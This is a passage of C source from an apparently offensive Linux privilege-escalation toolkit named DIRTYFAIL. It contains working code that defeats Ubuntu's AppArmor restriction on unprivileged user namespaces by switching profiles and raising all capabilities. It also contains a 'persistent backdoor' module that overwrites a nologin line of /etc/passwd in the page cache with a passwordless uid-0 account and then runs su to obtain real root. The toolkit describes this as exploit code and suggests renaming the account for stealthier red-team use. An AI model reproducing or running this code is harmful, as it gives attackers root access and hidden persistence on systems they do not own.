#ifndef CLONE_NEWNET
#define CLONE_NEWNET 0x40000000
#endif
/*
* Once stage 2 has successfully unshared and elevated us into a fresh
* userns with full caps, this flag is set. apparmor_bypass_needed()
* short-circuits on it so main() doesn't re-arm the bypass after stage
* 2 returns — that would create a NESTED userns each iteration and
* eventually fail with ENOSPC at the nesting cap.
*
* The flag is process-local; it resets to false on every fresh exec,
* which is exactly what we want — each stage's main() starts fresh.
*/
static bool g_bypass_done = false;
bool apparmor_bypass_was_armed(void) { return g_bypass_done; }
bool apparmor_userns_caps_blocked(void)
{
#ifdef __linux__
/* Quick check: if the AA sysctl isn't there or is 0, no blocking. */
int fd = open("/proc/sys/kernel/apparmor_restrict_unprivileged_userns",
O_RDONLY);
if (fd < 0) return false; /* no AA hardening sysctl */
char b[8] = {0};
ssize_t n = read(fd, b, sizeof(b) - 1);
close(fd);
if (n <= 0 || b[0] != '1') return false;
/* Sysctl says hardened. Confirm by forking a child that
* unshares(USER) and tries to write to /proc/self/setgroups —
* a CAP_SYS_ADMIN-gated operation that would succeed inside a
* fresh userns IFF caps survived the transition. On 26.04-style
* hardening the auto-transition to unprivileged_userns sub-
* profile denies the cap, write fails with EPERM. */
pid_t pid = fork();
if (pid < 0) return false;
if (pid == 0) {
if (syscall(SYS_unshare, CLONE_NEWUSER) != 0) _exit(1);
int wfd = open("/proc/self/setgroups", O_WRONLY);
if (wfd < 0) _exit(2); /* EPERM here = blocked */
ssize_t w = write(wfd, "deny", 4);
close(wfd);
_exit(w == 4 ? 0 : 3); /* 0 = caps work, 3 = blocked */
}
int wstat = 0;
waitpid(pid, &wstat, 0);
/* Caps work if child exited 0; any non-zero means blocked or error. */
return !(WIFEXITED(wstat) && WEXITSTATUS(wstat) == 0);
#else
return false;
#endif
}
/* ---------------------------------------------------------------- *
* Profile switch primitive
*
* Writing "exec <profile>" to /proc/self/attr/exec asks the kernel to
* switch to the named AppArmor profile on the *next* execve. The
* switch is silent if the profile doesn't exist (the next exec just
* stays in the current profile); we don't get an error until we try
* to use a capability the current profile would have blocked. So we
* try multiple candidate profiles in priority order.
* ---------------------------------------------------------------- */
#ifdef __linux__
static int change_onexec(const char *profile)
{
int fd = open("/proc/self/attr/exec", O_WRONLY);
if (fd < 0) return -1;
char b[256];
int n = snprintf(b, sizeof(b), "exec %s", profile);
ssize_t r = write(fd, b, n);
int e = errno;
close(fd);
errno = e;
return r == n ? 0 : -1;
}
static bool write_proc(const char *path, const char *value)
{
int fd = open(path, O_WRONLY);
if (fd < 0) return false;
ssize_t n = write(fd, value, strlen(value));
close(fd);
return n == (ssize_t)strlen(value);
}
#endif
/* ---------------------------------------------------------------- *
* Profile probe — read /proc/self/attr/current
*
* Output looks like one of:
*
* "unconfined\n" — not restricted
* "/usr/bin/dirtyfail (enforce)\n" — restricted!
* "unprivileged_userns (enforce)\n" — Ubuntu 24.04 default
* ---------------------------------------------------------------- */
bool apparmor_bypass_needed(void)
{
#ifdef __linux__
/* If stage 2 already ran in this process, we've already entered a
* fresh userns with caps — don't re-arm or we'd nest further. */
if (g_bypass_done) return false;
/* First check the kernel sysctl. On Ubuntu 24.04 and similar
* hardened distros, `kernel.apparmor_restrict_unprivileged_userns=1`
* silently strips caps inside ANY userns we create — REGARDLESS of
* whether /proc/self/attr/current shows "unconfined". This sysctl
* is the authoritative signal; it short-circuits the probe. */
int fd = open("/proc/sys/kernel/apparmor_restrict_unprivileged_userns", O_RDONLY);
if (fd >= 0) {
char b[8] = {0};
ssize_t n = read(fd, b, sizeof(b) - 1);
close(fd);
if (n > 0 && b[0] == '1') return true;
}
/* No global sysctl restriction. AppArmor may still be enforcing
* a per-profile rule, so check /proc/self/attr/current. If that
* file is missing entirely, AppArmor isn't loaded → no bypass. */
fd = open("/proc/self/attr/current", O_RDONLY);
if (fd < 0) return false;
char buf[256];
ssize_t n = read(fd, buf, sizeof(buf) - 1);
close(fd);
if (n <= 0) return false;
buf[n] = '\0';
/* "unconfined" with no global sysctl restriction → no bypass needed.
* NOTE: we already excluded the Ubuntu 24.04 case above; only here
* if the sysctl is 0 or the sysctl file doesn't exist. */
if (strncmp(buf, "unconfined", 10) == 0) return false;
/* Anything else (including "(enforce)" and "(complain)") is
* potentially restricting our userns caps. Run an empirical probe:
* fork → child does unshare(CLONE_NEWUSER) → tries to open a
* netlink XFRM socket → if that fails, bypass IS needed. */
pid_t pid = fork();
if (pid < 0) return false;
if (pid == 0) {
if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0)
_exit(1);
write_proc("/proc/self/setgroups", "deny");
char m[64];
snprintf(m, sizeof(m), "0 %u 1", (unsigned)getuid());
write_proc("/proc/self/uid_map", m);
snprintf(m, sizeof(m), "0 %u 1", (unsigned)getgid());
write_proc("/proc/self/gid_map", m);
/* The decisive probe: bring lo up. Needs CAP_NET_ADMIN. */
int s = socket(AF_INET, SOCK_DGRAM, 0);
if (s < 0) _exit(2);
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
if (ioctl(s, SIOCGIFFLAGS, &ifr) != 0) { close(s); _exit(3); }
ifr.ifr_flags |= IFF_UP;
int rc = ioctl(s, SIOCSIFFLAGS, &ifr);
close(s);
_exit(rc == 0 ? 0 : 4);
}
int wstat = 0;
waitpid(pid, &wstat, 0);
bool caps_work = WIFEXITED(wstat) && WEXITSTATUS(wstat) == 0;
return !caps_work;
#else
return false;
#endif
}
/* ---------------------------------------------------------------- *
* Stage handlers
* ---------------------------------------------------------------- */
bool apparmor_bypass_is_stage(int argc, char **argv)
{
return argc >= 2 &&
(strcmp(argv[1], AA_STAGE1_TAG) == 0 ||
strcmp(argv[1], AA_STAGE2_TAG) == 0);
}
int apparmor_bypass_run_stage(int argc, char **argv,
int *out_argc, char ***out_argv)
{
#ifdef __linux__
if (argc < 2) return -1;
if (strcmp(argv[1], AA_STAGE1_TAG) == 0) {
/* We are now in the `crun` profile (unconfined + userns).
* Originally we did a second hop to `chrome` for extra paranoia,
* mirroring aa-rootns; in practice that hop fails on Ubuntu
* 24.04 with ENOSPC from the subsequent unshare for reasons
* that aren't fully understood (possibly a per-profile userns
* accounting wrinkle). One hop into crun is sufficient — crun
* already has `userns,` and `flags=(unconfined)`, so unshare
* works and we keep things simple. Just re-exec with STAGE2
* to drop into the unshare+capset step. */
argv[1] = (char *)AA_STAGE2_TAG;
execv("/proc/self/exe", argv);
return -1; /* execv only returns on failure */
}
if (strcmp(argv[1], AA_STAGE2_TAG) == 0) {
/* We are now in an unconfined profile. Do the userns + capset
* dance ourselves so the next code path inherits root in the
* userns and full caps. */
uid_t u = getuid();
gid_t g = getgid();
if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) {
log_bad("apparmor_bypass: unshare failed: %s", strerror(errno));
return -1;
}
write_proc("/proc/self/setgroups", "deny");
char m[64];
snprintf(m, sizeof(m), "0 %u 1", (unsigned)u);
write_proc("/proc/self/uid_map", m);
snprintf(m, sizeof(m), "0 %u 1", (unsigned)g);
write_proc("/proc/self/gid_map", m);
/* Drop into uid 0 inside the new userns. */
if (setresuid(0, 0, 0) != 0) { log_bad("setresuid: %s", strerror(errno)); }
if (setresgid(0, 0, 0) != 0) { log_bad("setresgid: %s", strerror(errno)); }
/* Promote permitted → inheritable, then ambient — so caps
* survive any execvp the caller does later. */
struct __user_cap_header_struct h = { _LINUX_CAPABILITY_VERSION_3, 0 };
struct __user_cap_data_struct d[2];
memset(d, 0, sizeof(d));
if (syscall(SYS_capget, &h, d) == 0) {
d[0].inheritable = d[0].permitted;
d[1].inheritable = d[1].permitted;
syscall(SYS_capset, &h, d);
for (int c = 0; c < 64; c++)
prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, c, 0, 0);
}
/* Bring lo up — most consumers need it. */
int s = socket(AF_INET, SOCK_DGRAM, 0);
if (s >= 0) {
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
if (ioctl(s, SIOCGIFFLAGS, &ifr) == 0) {
ifr.ifr_flags |= IFF_UP | IFF_RUNNING;
ioctl(s, SIOCSIFFLAGS, &ifr);
}
close(s);
}
/* Strip the stage marker from argv so main() sees its normal args. */
for (int i = 1; i + 1 < argc; i++) argv[i] = argv[i + 1];
argv[argc - 1] = NULL;
*out_argc = argc - 1;
*out_argv = argv;
g_bypass_done = true; /* prevents re-arm in main() */
log_ok("apparmor bypass complete — uid=%u, in fresh userns", getuid());
return 0;
}
#else
(void)argc; (void)argv; (void)out_argc; (void)out_argv;
#endif
return -1;
}
int apparmor_bypass_fork_arm(int argc, char **argv)
{
#ifdef __linux__
/* Caller may pass argc=0/argv=NULL; arm_and_relaunch needs a
* valid argv[0] for execv. Fabricate a minimal one if needed. */
char *fallback[2] = { (char *)"dirtyfail", NULL };
if (argc <= 0 || argv == NULL || argv[0] == NULL) {
argc = 1;
argv = fallback;
}
pid_t child = fork();
if (child < 0) return -1;
if (child == 0) {
/* Child arms the bypass and execs through the stages. Env
* vars set by the caller (DIRTYFAIL_INNER_MODE etc.) survive
* execv, so stage 2 sees them. */
apparmor_bypass_arm_and_relaunch(argc, argv);
/* arm_and_relaunch only returns on failure. */
log_bad("child: bypass arm failed: %s", strerror(errno));
_exit(1);
}
int wstat = 0;
if (waitpid(child, &wstat, 0) < 0) return -1;
if (WIFEXITED(wstat)) return WEXITSTATUS(wstat);
if (WIFSIGNALED(wstat)) {
log_bad("child killed by signal %d", WTERMSIG(wstat));
return -1;
}
return -1;
#else
(void)argc; (void)argv; return -1;
#endif
}
int apparmor_bypass_arm_and_relaunch(int argc, char **argv)
{
#ifdef __linux__
/* On AppArmor-restricted systems (Ubuntu 24.04+), switch to an
* unconfined profile via change_onexec so the post-exec userns
* unshare retains caps. On non-AppArmor systems
* (Debian/Alma/Fedora/etc.) /proc/self/attr/exec doesn't exist,
* change_onexec fails — that's fine, unshare works without any
* profile gymnastics on those kernels. Fail through gracefully. */
if (change_onexec("crun") < 0)
change_onexec("chrome"); /* best effort, both may no-op */
/* Build a new argv: [argv[0], AA_STAGE1_TAG, original argv[1..]]. */
char **na = calloc(argc + 2, sizeof(char *));
if (!na) return -1;
na[0] = argv[0];
na[1] = (char *)AA_STAGE1_TAG;
for (int i = 1; i < argc; i++) na[i + 1] = argv[i];
na[argc + 1] = NULL;
log_step("apparmor bypass armed — re-execing self via crun/chrome profile");
execv("/proc/self/exe", na);
/* If execv fails, fall through and let main() proceed un-bypassed. */
int e = errno;
free(na);
errno = e;
#else
(void)argc; (void)argv;
#endif
return -1;
}
+113
View File
@@ -0,0 +1,113 @@
/*
* DIRTYFAIL — apparmor_bypass.h
*
* Defeat Ubuntu's `apparmor_restrict_unprivileged_userns=1` policy.
*
* The default Ubuntu apparmor profile applied to unprivileged programs
* lets `unshare(CLONE_NEWUSER)` succeed but **strips CAP_NET_ADMIN**
* inside the new namespace — so XFRM SA registration, raw sockets, etc.
* fail downstream even though we appear to be uid 0 in our userns.
*
* The bypass: switch to a permissive AppArmor profile (`crun`, `chrome`,
* etc.) via `change_onexec` *before* unshare. Those profiles don't
* carry the userns-cap-strip rule, so the kernel hands us the full
* effective set inside the new namespace.
*
* Mechanics — three stages, two re-execs:
*
* stage 0 (entry): change_onexec(crun); execv(self, AA1, ...args)
* stage 1 (in crun): change_onexec(chrome); execv(self, AA2, ...args)
* stage 2 (in chrome): unshare(USER|NET); maps; capset; ambient caps;
* re-enter normal main() flow with bypass marked
*
* The two-hop dance is what `aa-rootns` (Brad Spengler / 0xdeadbeef)
* demonstrated. The "chrome" hop is technically optional — the "crun"
* profile is already unconfined for our purposes — but the second hop
* defeats some hardened policies that audit chained execs.
*
* Detection of "do we need the bypass?" is best-effort:
* - read /proc/self/attr/current; if it ends with " (enforce)" and
* mentions "unprivileged_userns", we're being restricted.
* - or: probe by spawning a child that does unshare(CLONE_NEWUSER)
* and tries `ip link add type dummy` — if that fails with EPERM,
* the caps were stripped.
*/
#ifndef DIRTYFAIL_APPARMOR_BYPASS_H
#define DIRTYFAIL_APPARMOR_BYPASS_H
#include "common.h"
/* Stage markers used as argv[1] to route re-execs. */
#define AA_STAGE1_TAG "DIRTYFAIL-AA-STAGE-1"
#define AA_STAGE2_TAG "DIRTYFAIL-AA-STAGE-2"
/* Returns true if `argv[1]` is one of the AA-* stage markers, in which
* case main() should hand control to apparmor_bypass_run_stage(). */
bool apparmor_bypass_is_stage(int argc, char **argv);
/* Execute the appropriate stage based on argv[1]. This either re-execs
* self (stage 1) or returns the modified argv after unshare+caps setup
* for the caller to continue with (stage 2). The function does not
* return on stage 1 (always execv). On stage 2, returns 0 on success
* and writes the caller's continuation argv to *out_argc / *out_argv. */
int apparmor_bypass_run_stage(int argc, char **argv,
int *out_argc, char ***out_argv);
/* Probe: does this process actually need the bypass to gain
* CAP_NET_ADMIN inside a fresh user namespace? Returns true if YES. */
bool apparmor_bypass_needed(void);
/* True iff stage 2 of the bypass ran successfully in this process —
* i.e. we're now inside a fresh user/net namespace with full caps,
* and any further unshare() would nest. Exploit modules check this
* before deciding whether to fork+unshare on their own. */
bool apparmor_bypass_was_armed(void);
/* Probe whether the bypass actually grants caps on this kernel.
* Forks a child that does unshare(USER) and tries to write to
* /proc/self/setgroups; if that fails with EPERM, we're on a kernel
* (Ubuntu 26.04+) that auto-transitions to the unprivileged_userns
* sub-profile and denies caps regardless of bypass technique.
*
* Returns true if unprivileged userns is COMPREHENSIVELY blocked
* (the bug class is unreachable for unprivileged users). Returns
* false if userns operations work normally OR if AA isn't loaded
* at all (in which case `apparmor_bypass_needed()` would also
* return false).
*
* This is the right signal for `--scan` to report "VULNERABLE in
* kernel but LSM-mitigated" vs plain "VULNERABLE".
*/
bool apparmor_userns_caps_blocked(void);
/* Fork a child that arms the AA bypass and re-execs itself through
* the stages. The child eventually lands inside a fresh user/net
* namespace with full caps; main() in that re-exec'd image dispatches
* to the inner-mode handler indicated by the DIRTYFAIL_INNER_MODE
* environment variable.
*
* The PARENT stays in the init namespace and waits for the child via
* waitpid. After the child exits, the parent can read the global
* page cache (which reflects whatever the child modified) and then
* execlp("su", ...) in init namespace to reach REAL init-ns root —
* this is the whole point of the outer/inner split.
*
* Caller must setenv("DIRTYFAIL_INNER_MODE", "...", 1) and any other
* mode-specific env vars BEFORE calling this. The child inherits the
* full environment.
*
* Returns the child's exit code on success. -1 on fork failure. */
int apparmor_bypass_fork_arm(int argc, char **argv);
/* Trigger the bypass: change_onexec(crun) then re-exec self with stage
* markers. Caller passes the argv it wants to resume with (stage 2 will
* hand that argv back via apparmor_bypass_run_stage's out_argv).
*
* Does not return on success (control transfers to the new process
* image). Returns -1 with errno set if the change_onexec or execv
* failed; in that case the caller may continue without bypass and let
* downstream syscalls fail loudly. */
int apparmor_bypass_arm_and_relaunch(int argc, char **argv);
#endif
+382
View File
@@ -0,0 +1,382 @@
/*
* DIRTYFAIL — backdoor.c
*
* Persistent uid-0 backdoor via length-matched /etc/passwd line
* substitution. See backdoor.h for the design rationale.
*
* Flow:
*
* install:
* 1. parse /etc/passwd, find longest line with nologin/false/sync shell
* 2. compute replacement "dirtyfail::0:0:<pad>:/:/bin/bash" same length
* 3. snapshot state to /var/tmp/.dirtyfail.state
* 4. for each byte that differs:
* cfg_1byte_write(/etc/passwd, byte_off, new_byte)
* 5. exec su - dirtyfail (PAM nullok accepts empty password)
*
* cleanup:
* 1. read state (LINE_OFF, original VICTIM_LINE)
* 2. read current page-cache bytes at that line
* 3. for each byte that differs from VICTIM_LINE:
* cfg_1byte_write(/etc/passwd, byte_off, original_byte)
* 4. delete state file
*/
#include "backdoor.h"
#include "copyfail_gcm.h"
#include "apparmor_bypass.h"
#include <fcntl.h>
#include <pwd.h>
#include <stdlib.h>
#include <sys/stat.h>
#define STATE_FILE "/var/tmp/.dirtyfail.state"
#define NEW_USER "dirtyfail"
#define DF_PREFIX "dirtyfail::0:0:"
#define DF_SUFFIX ":/:/bin/bash"
/* ---- /etc/passwd line picker ---------------------------------------- *
*
* Walk lines, parse to find the shell field (last colon-separated
* field), accept if shell is one of the canonical "no-login" shells.
* Pick the longest acceptable line so the replacement has room for
* padding.
*/
/* Line buffer is 512 bytes — enough for any sane /etc/passwd entry,
* including ones with very long gecos strings or unusual home paths.
* Lines longer than this are silently skipped by find_victim(). */
struct victim {
off_t line_off;
size_t line_len;
char line[512];
char name[64];
};
static bool is_nologin_shell(const char *shell)
{
static const char *deny[] = {
"/usr/sbin/nologin",
"/sbin/nologin",
"/bin/false",
"/usr/bin/false",
"/bin/sync",
NULL,
};
for (size_t i = 0; deny[i]; i++)
if (strcmp(shell, deny[i]) == 0) return true;
return false;
}
static bool find_victim(struct victim *v)
{
int fd = open("/etc/passwd", O_RDONLY);
if (fd < 0) { log_bad("open /etc/passwd: %s", strerror(errno)); return false; }
struct stat st;
if (fstat(fd, &st) < 0) { close(fd); return false; }
char *buf = malloc(st.st_size + 1);
if (!buf) { close(fd); return false; }
ssize_t n = read(fd, buf, st.st_size);
close(fd);
if (n <= 0) { free(buf); return false; }
buf[n] = '\0';
bool found = false;
char *line = buf;
char *end = buf + n;
while (line < end) {
char *nl = memchr(line, '\n', end - line);
size_t len = nl ? (size_t)(nl - line) : (size_t)(end - line);
if (len == 0 || len >= sizeof(v->line)) goto next;
char tmp[512];
memcpy(tmp, line, len);
tmp[len] = '\0';
/* Last field after final ':' is the shell. */
char *shell = strrchr(tmp, ':');
if (!shell) goto next;
shell++;
if (!is_nologin_shell(shell)) goto next;
if (len > v->line_len) {
v->line_off = line - buf;
v->line_len = len;
memcpy(v->line, line, len);
v->line[len] = '\0';
char *colon = memchr(v->line, ':', len);
size_t nlen = colon ? (size_t)(colon - v->line) : len;
if (nlen >= sizeof(v->name)) nlen = sizeof(v->name) - 1;
memcpy(v->name, v->line, nlen);
v->name[nlen] = '\0';
found = true;
}
next:
if (!nl) break;
line = nl + 1;
}
free(buf);
return found;
}
/* ---- state file ----------------------------------------------------- */
static bool save_state(off_t line_off, const char *victim_line, size_t len)
{
int fd = open(STATE_FILE, O_WRONLY | O_CREAT | O_TRUNC, 0600);
if (fd < 0) { log_bad("open state: %s", strerror(errno)); return false; }
char buf[2048];
int n = snprintf(buf, sizeof(buf), "LINE_OFF=%lld\nVICTIM_LEN=%zu\nVICTIM_LINE=",
(long long)line_off, len);
bool ok = (write(fd, buf, n) == n)
&& (write(fd, victim_line, len) == (ssize_t)len)
&& (write(fd, "\n", 1) == 1);
close(fd);
if (!ok) {
log_bad("save_state write: %s", strerror(errno));
unlink(STATE_FILE);
}
return ok;
}
static bool load_state(off_t *line_off, char *victim_line, size_t cap, size_t *len)
{
int fd = open(STATE_FILE, O_RDONLY);
if (fd < 0) return false;
char buf[2048];
ssize_t n = read(fd, buf, sizeof(buf) - 1);
close(fd);
if (n <= 0) return false;
buf[n] = '\0';
char *p = strstr(buf, "LINE_OFF=");
if (!p) return false;
*line_off = (off_t)strtoll(p + 9, NULL, 10);
char *v = strstr(buf, "VICTIM_LINE=");
if (!v) return false;
v += 12;
char *end = strchr(v, '\n');
if (!end) end = buf + n;
size_t vlen = end - v;
if (vlen >= cap) return false;
memcpy(victim_line, v, vlen);
victim_line[vlen] = '\0';
*len = vlen;
return true;
}
/* Describe state file if present, for `--list-state`. Returns true if a
* backdoor state file was found and described, false if absent. */
bool backdoor_list_state(void)
{
off_t off = 0;
char victim[2048];
size_t len = 0;
if (!load_state(&off, victim, sizeof(victim), &len))
return false;
log_warn("backdoor planted — state file %s", STATE_FILE);
log_hint(" victim line was at offset %lld (%zu bytes)",
(long long)off, len);
log_hint(" original line: %s", victim);
log_hint(" the page cache currently has 'dirtyfail::0:0:...:/:/bin/bash'");
log_hint(" in place of the above. Revert with `--cleanup-backdoor`.");
return true;
}
/* ---- byte-flip helper ----------------------------------------------- *
*
* For each char position where `cur[i] != target[i]`, call the
* 1-byte primitive to land the new byte. Linear in number of
* differing bytes; on a typical /etc/passwd line that's ~30-40 flips.
*/
static bool apply_flips(off_t base_off, const char *cur, const char *want, size_t len)
{
size_t flips = 0;
for (size_t i = 0; i < len; i++) {
if (cur[i] == want[i]) continue;
if (!cfg_1byte_write("/etc/passwd",
base_off + i, (unsigned char)want[i])) {
log_bad("byte flip failed at offset %lld",
(long long)(base_off + i));
return false;
}
flips++;
if ((flips & 7) == 0) putchar('.'), fflush(stdout);
}
if (flips) putchar('\n');
log_step("applied %zu byte flips", flips);
return true;
}
/* ---- INNER (bypass userns) — does only the byte flips ------------- */
df_result_t backdoor_install_inner(void)
{
const char *off_s = getenv("DIRTYFAIL_LINE_OFF");
const char *victim_s = getenv("DIRTYFAIL_VICTIM_LINE");
const char *target_s = getenv("DIRTYFAIL_TARGET_LINE");
if (!off_s || !victim_s || !target_s) {
log_bad("inner: DIRTYFAIL_LINE_OFF / VICTIM_LINE / TARGET_LINE not set");
return DF_TEST_ERROR;
}
off_t line_off = (off_t)atoll(off_s);
size_t len = strlen(victim_s);
if (strlen(target_s) != len) {
log_bad("inner: victim/target lengths differ (%zu vs %zu)",
len, strlen(target_s));
return DF_TEST_ERROR;
}
if (!apply_flips(line_off, victim_s, target_s, len)) {
return DF_EXPLOIT_FAIL;
}
return DF_EXPLOIT_OK;
}
df_result_t backdoor_cleanup_inner(void)
{
const char *off_s = getenv("DIRTYFAIL_LINE_OFF");
const char *victim_s = getenv("DIRTYFAIL_VICTIM_LINE");
const char *target_s = getenv("DIRTYFAIL_TARGET_LINE");
if (!off_s || !victim_s || !target_s) {
log_bad("inner-cleanup: env vars not set");
return DF_TEST_ERROR;
}
off_t line_off = (off_t)atoll(off_s);
size_t len = strlen(victim_s);
if (!apply_flips(line_off, target_s, victim_s, len)) { /* reverse direction */
return DF_EXPLOIT_FAIL;
}
return DF_EXPLOIT_OK;
}
/* ---- OUTER (init ns) — find_victim, save_state, fork bypass child --- */
df_result_t backdoor_install(bool do_shell)
{
log_step("Persistent backdoor — install");
/* Did we already install? Check via getpwnam. */
struct passwd *pw = getpwnam(NEW_USER);
if (pw && pw->pw_uid == 0) {
log_ok("'%s' already in /etc/passwd as uid 0", NEW_USER);
if (!do_shell) return DF_EXPLOIT_OK;
log_ok("invoking 'su - %s'", NEW_USER);
execlp("su", "su", "-", NEW_USER, (char *)NULL);
return DF_EXPLOIT_FAIL;
}
struct victim v;
memset(&v, 0, sizeof(v));
if (!find_victim(&v)) {
log_bad("no nologin victim line found in /etc/passwd");
return DF_TEST_ERROR;
}
log_step("victim line: '%s' at offset %lld (%zu bytes)",
v.name, (long long)v.line_off, v.line_len);
/* Build replacement, same length. */
size_t fixed_len = strlen(DF_PREFIX) + strlen(DF_SUFFIX);
if (v.line_len < fixed_len) {
log_bad("victim line too short (%zu) for dirtyfail replacement (need >= %zu)",
v.line_len, fixed_len);
return DF_TEST_ERROR;
}
size_t pad_len = v.line_len - fixed_len;
char target[512];
char *p = target;
memcpy(p, DF_PREFIX, strlen(DF_PREFIX)); p += strlen(DF_PREFIX);
memset(p, 'X', pad_len); p += pad_len;
memcpy(p, DF_SUFFIX, strlen(DF_SUFFIX)); p += strlen(DF_SUFFIX);
*p = '\0';
log_step("replacement: '%s'", target);
log_warn("about to length-match overwrite '%s' → '%s' (%zu bytes)",
v.name, NEW_USER, v.line_len);
log_warn("ON-DISK /etc/passwd is unchanged. State stashed at %s.", STATE_FILE);
if (!typed_confirm("DIRTYFAIL")) { log_bad("confirmation declined"); return DF_OK; }
if (!save_state(v.line_off, v.line, v.line_len)) return DF_TEST_ERROR;
/* Hand off to inner via env vars. */
char off_str[32];
snprintf(off_str, sizeof(off_str), "%lld", (long long)v.line_off);
setenv("DIRTYFAIL_INNER_MODE", "backdoor-install", 1);
setenv("DIRTYFAIL_LINE_OFF", off_str, 1);
setenv("DIRTYFAIL_VICTIM_LINE", v.line, 1);
setenv("DIRTYFAIL_TARGET_LINE", target, 1);
int rc = apparmor_bypass_fork_arm(0, NULL);
if (rc != DF_EXPLOIT_OK) {
log_bad("inner backdoor-install failed (exit=%d)", rc);
return DF_EXPLOIT_FAIL;
}
/* Verify in init ns */
if (!(pw = getpwnam(NEW_USER)) || pw->pw_uid != 0) {
log_bad("post-flip getpwnam(%s) doesn't show uid 0 — install failed",
NEW_USER);
return DF_EXPLOIT_FAIL;
}
log_ok("'%s' is now uid 0 in the page cache copy of /etc/passwd",
NEW_USER);
log_hint("state stashed at %s — run 'dirtyfail --cleanup-backdoor' to revert",
STATE_FILE);
if (!do_shell) return DF_EXPLOIT_OK;
log_ok("invoking 'su - %s' in init ns (PAM nullok → REAL ROOT)", NEW_USER);
execlp("su", "su", "-", NEW_USER, (char *)NULL);
log_bad("execlp: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
df_result_t backdoor_cleanup(void)
{
log_step("Persistent backdoor — cleanup");
off_t line_off = 0;
char victim_line[512];
size_t victim_len = 0;
if (!load_state(&line_off, victim_line, sizeof(victim_line), &victim_len)) {
log_bad("no usable state file at %s", STATE_FILE);
return DF_TEST_ERROR;
}
log_step("restoring %zu bytes at offset %lld", victim_len, (long long)line_off);
/* Read CURRENT bytes (post-install) so we know what to flip back from. */
int fd = open("/etc/passwd", O_RDONLY);
if (fd < 0) { log_bad("open passwd: %s", strerror(errno)); return DF_TEST_ERROR; }
char cur[512];
if (pread(fd, cur, victim_len, line_off) != (ssize_t)victim_len) {
log_bad("pread: %s", strerror(errno));
close(fd); return DF_TEST_ERROR;
}
close(fd);
cur[victim_len] = '\0';
/* Hand off to inner. inner runs apply_flips(off, target=cur, victim=victim_line)
* to flip back from current state to original. */
char off_str[32];
snprintf(off_str, sizeof(off_str), "%lld", (long long)line_off);
setenv("DIRTYFAIL_INNER_MODE", "backdoor-cleanup", 1);
setenv("DIRTYFAIL_LINE_OFF", off_str, 1);
setenv("DIRTYFAIL_VICTIM_LINE", victim_line, 1);
setenv("DIRTYFAIL_TARGET_LINE", cur, 1);
int rc = apparmor_bypass_fork_arm(0, NULL);
if (rc != DF_EXPLOIT_OK) {
log_bad("inner backdoor-cleanup failed (exit=%d)", rc);
return DF_EXPLOIT_FAIL;
}
unlink(STATE_FILE);
log_ok("backdoor cleaned — line restored, state file removed");
#ifdef POSIX_FADV_DONTNEED
int e = open("/etc/passwd", O_RDONLY);
if (e >= 0) { posix_fadvise(e, 0, 0, POSIX_FADV_DONTNEED); close(e); }
#endif
return DF_OK;
}
+59
View File
@@ -0,0 +1,59 @@
/*
* DIRTYFAIL — backdoor.h
*
* Persistent uid-0 backdoor in the /etc/passwd page cache.
*
* MORE INVASIVE than the UID-flip exploits in copyfail.c /
* dirtyfrag_esp.c / dirtyfrag_rxrpc.c. Where those modify the calling
* user's UID for one shell session, this mode inserts a brand-new
* passwordless uid-0 user "dirtyfail" by length-matched overwrite of
* an existing nologin/false/sync line. The substituted line stays in
* the page cache until eviction, so:
*
* ./dirtyfail --exploit-backdoor # install + drop into root
* exit # back to your normal shell
* su - dirtyfail # any user, any time → root
*
* The username "dirtyfail" is intentionally chosen to match this
* project — anyone auditing /etc/passwd will spot it immediately,
* which is the opposite of stealth-by-default. If you need an
* undetectable backdoor for an authorized red-team engagement,
* change NEW_USER in backdoor.c.
*
* The on-disk /etc/passwd is unchanged. State (LINE_OFF, original
* VICTIM_LINE) is persisted at /var/tmp/.dirtyfail.state so that
* `--cleanup-backdoor` can restore the original line byte-by-byte
* via the same 1-byte primitive.
*
* This mode requires the GCM single-byte primitive (`cfg_1byte_write`)
* to land arbitrary bytes at arbitrary offsets — the 4-byte authencesn
* primitive can't easily rewrite a 50-byte line that doesn't align
* to 4-byte boundaries.
*
* Technique credit: 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo
* (`run.sh`); reimplemented here as a single C function.
*/
#ifndef DIRTYFAIL_BACKDOOR_H
#define DIRTYFAIL_BACKDOOR_H
#include "common.h"
df_result_t backdoor_install(bool do_shell);
df_result_t backdoor_cleanup(void);
/* INNER variants — run inside the AA bypass userns. The inner reads
* the operation parameters from env vars set by the outer:
* DIRTYFAIL_INNER_MODE = backdoor-install | backdoor-cleanup
* DIRTYFAIL_LINE_OFF = byte offset of the victim line
* DIRTYFAIL_VICTIM_LINE = original /etc/passwd line bytes
* DIRTYFAIL_TARGET_LINE = (install only) replacement bytes
*/
df_result_t backdoor_install_inner(void);
df_result_t backdoor_cleanup_inner(void);
/* Used by --list-state. Returns true if a backdoor state file is present
* (and prints a summary), false if no file exists. Side-effect free. */
bool backdoor_list_state(void);
#endif
+362
View File
@@ -0,0 +1,362 @@
/*
* DIRTYFAIL — common.c
*
* Tiny utility surface shared by the detectors and exploiters. Nothing
* here is CVE-specific — that lives in copyfail.c, dirtyfrag_esp.c and
* dirtyfrag_rxrpc.c.
*/
#include "common.h"
#include <ctype.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <pwd.h>
#ifdef __linux__
#include <sys/syscall.h>
#endif
/* On glibc <sched.h>+_GNU_SOURCE provides these. macOS lacks them; we
* still want this file to parse under macOS clang for static analysis,
* so the unprivileged_userns_allowed body itself is platform-guarded. */
#ifndef CLONE_NEWUSER
#define CLONE_NEWUSER 0x10000000
#endif
bool dirtyfail_use_color = true;
bool dirtyfail_active_probes = false;
bool dirtyfail_no_revert = false;
bool dirtyfail_json = false;
static void vlog(FILE *out, const char *prefix, const char *color,
const char *fmt, va_list ap)
{
if (dirtyfail_use_color && color)
fprintf(out, "\033[%sm%s\033[0m ", color, prefix);
else
fprintf(out, "%s ", prefix);
vfprintf(out, fmt, ap);
fputc('\n', out);
